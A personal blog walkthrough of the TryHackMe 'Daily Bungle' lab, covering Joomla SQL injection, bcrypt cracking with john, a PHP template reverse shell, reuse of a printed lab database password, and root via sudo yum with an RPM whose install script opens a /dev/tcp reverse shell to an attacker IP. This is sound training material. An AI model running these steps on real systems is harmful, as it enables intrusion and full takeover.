Skip to content

Tag: Daily Bungle

THM – Daily Bungle

Published by Bobby Lin on July 2, 2021
Amazing Spider-Man: The Daily Bugle (2020) #2 | Comic Issues | Marvel

Lab Stats

Time: 6 hours

Hint taken: 0

Difficulty: Hard

Recon

I accessed the web server. This is a blog-like application showing an item that “Spider-man” rob the bank.

Looking at the HTML, it shows that Joomla! is being used.

At first look, I am trying to find the Joomla! version in the web pages – but does not seems to have the info.

I googled for more information and found out that we can see the Joomla! version by looking at the language.

https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website

Web Enumeration

Navigate to robots.txt

I tried navigating all the directories in robots.txt. The /administrator was promising because it shows an admin panel.

But I need to find the credentials for Super User first.

Network scanning

  • ssh (22)
  • http (80)
  • mysql (3306)

It seems like the main attack vectors are the web server and database.

Gaining Foothold (1)

I tried a few SQL Injection payload in user login feature. But it does not work.

So I googled for exploit for Joomla! 3.7.0

https://raw.githubusercontent.com/NinjaJc01/joomblah-3/master/joomblah.py

Note: This requires python2

Found table:', 'fb9j5_users') Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')

I will need to crack the password. First, I try to see what is the hash algorithm used for the password using online hash identifier (https://hashes.com/en/tools/hash_identifier)

I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt

So the password is spiderman123

I login on as jonah in the admin panel.

Getting Reverse Shell from Joomla!

This took more time.

After googling, I discover that we can change the index.php file in the template to php reverse shell.

Joomla: Reverse Shell

Gaining Foothold (2)

I struggle to find the user flag manually. So I decided to run some Linux Enumeration scripts.

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Mistakes

I went through my Linux PE checklist and none of the checks is working.

I saw we have an account:

  • jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash

In addition, I tried to check a few things:

  • Trying all the SUID binaries to see if I can escalate privileges -> Doesn’t work
  • Looking for Kernel Exploits -> Doesn’t work

Then during the linpeas enumeration, I saw a database password was discovered.

  • Test if mysql has any exploit and whether it is running as root -> Doesn’t work
    • I tried to login as root: mysql -u root -p -D joomla
    • But there are nothing useful there.
  • I tried looking for Linux exploits and sudo exploits -> Doesn’t work
  • No progress. I am going to login as jjameson in SSH. I tried bruteforcing but it does not work.

How I realize my mistakes?

At this point, I have not made any progress other than finding the database password.

MYSQL Password
user: root
pw: nv5uz9r3ZEDzVjNu

So I read through the checklist of other hackers.

This helps alot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

I realized my mistake. I should check if the discovered passwords are being reused for SSH and not rely on brute-forcing only.

SSH – Login Checks Methodology

  1. Check if whether the known passwords are reused? Do this for every new password discovered during enumeration
  2. If not, then try to bruteforce.

I took 4 hours to figure out that the database password is reused as jjameson ssh password.

Privilege Escalation

Now I can login as jjameson.

The first thing I do is to run sudo -l

I saw that this account can run sudo yum.

Yum PE

Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

First I need to install fpm and rpm.

git clone https://github.com/jordansissel/fpm
cd fpm
sudo gem install fpm
sudo apt-get install rpm

Then create a root.sh file with the payload:

#!/bin/bash

bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1

Then create the package with root.sh:

fpm -n root -s dir -t rpm -a all --before-install root.sh .

Start a nc listener at port 3333.

Download the package in the target machine and install:

sudo yum localinstall -y [package name].rpm

In the listener, we will receive connection as root user.